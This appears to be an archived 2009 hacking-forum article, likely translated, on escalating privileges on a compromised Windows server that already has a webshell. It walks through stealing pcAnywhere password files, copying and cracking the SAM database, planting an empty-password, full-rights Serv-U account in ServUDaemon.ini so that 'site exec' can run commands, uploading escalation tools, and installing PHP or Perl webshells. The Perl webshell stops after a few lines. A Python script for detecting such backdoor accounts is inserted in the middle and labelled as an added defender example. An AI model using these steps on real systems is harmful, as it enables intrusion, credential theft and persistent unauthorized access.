Privilege elevation techniques of many experts

2009-02-23T00:00:00
ID MYHACK58:62200922278
Type myhack58
Reporter Anonymous
Modified 2009-02-23T00:00:00

Description

Once we have a webshell, the next thing we want to do is elevate privileges.

My personal summary is as follows:

  1. C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere: see whether you can browse to this directory. If you can, that is the best case: take the CIF file directly from it, recover the pcAnywhere password, and log in.

  2. C:\WINNT\system32\config: go in here for the SAM, then crack the users' passwords.

c:\winnt\repair holds the backup copy.

Software for cracking the SAM passwords includes LC and SAMInside.

  3. C:\Documents and Settings\All Users\Start Menu\Programs: see whether you can browse to this directory; from here we can get a lot of useful information.

You will see many shortcuts. We usually pick Serv-U, download the shortcut and view its properties locally to learn the installation path, then see whether we can browse to that path.

Once inside, if you have permission to modify ServUDaemon.ini, add a user with an empty password:

[USER=dede|1]

Password=

HomeDir=c:\

TimeOut=600

Maintenance=System

Access1=C:\|RWAMELCDP

Access1=d:\|RWAMELCDP

Access1=f:\|RWAMELCDP

SKEYValues=

This user has the highest permissions; we can then connect over FTP and run quote site exec xxx to elevate privileges.
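For defenders, the account pattern in the entry above (empty Password, Maintenance=System, access rules on drive roots) can be searched for in a ServUDaemon.ini. The following is an added example, not code from the original article: the sample file, the second account and its hash are constructed, and the meaning of the W and E flags is an assumption.

```python
import re
# Constructed sample in the layout of the entry above, plus one ordinary account.
SAMPLE_INI = r"""
[USER=dede|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
[USER=webupload|1]
Password=ab0123456789abcdef0123456789abcdef
HomeDir=d:\sites\example
Access1=d:\sites\example|RWAMLCDP
"""

USER_RE = re.compile(r"^\[USER=([^|\]]+)(?:\|[^\]]*)?\]$", re.I)
ROOT_RE = re.compile(r"^[A-Za-z]:\\?$")  # a bare drive root such as C:\

def parse_users(text):
    """Return {user: [(key, value), ...]}; a list keeps repeated keys like Access1."""
    users, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            m = USER_RE.match(line)
            current = users.setdefault(m.group(1), []) if m else None
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            current.append((key.strip(), value.strip()))
    return users

def audit(text):
    """Return {user: [findings]}; a missing Password key counts as empty."""
    report = {}
    for user, pairs in parse_users(text).items():
        found = []
        if not any(k.lower() == "password" and v for k, v in pairs):
            found.append("empty password")
        if any(k.lower() == "maintenance" and v.lower() == "system" for k, v in pairs):
            found.append("Maintenance=System")
        for k, v in pairs:
            path, _, flags = v.partition("|")
            # Assumption: W = write and E = execute in Serv-U access flags.
            if k.lower().startswith("access") and ROOT_RE.match(path) and set("WE") & set(flags.upper()):
                found.append(f"write/execute on drive root {path}")
        if found:
            report[user] = found
    return report
```

Calling audit() on the text of a real ServUDaemon.ini returns only the accounts that need review; an empty result means none matched.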

  4. c:\winnt\system32\inetsrv\data: this directory likewise gives Everyone full control; all we have to do is upload a privilege-elevation tool and then execute it.

  5. See whether you can browse to the following directories:

c:\php: use phpspy

c:\perl: it is sometimes not this directory (again, you can find out by downloading a shortcut and viewing its properties); use a CGI webshell

#!/usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);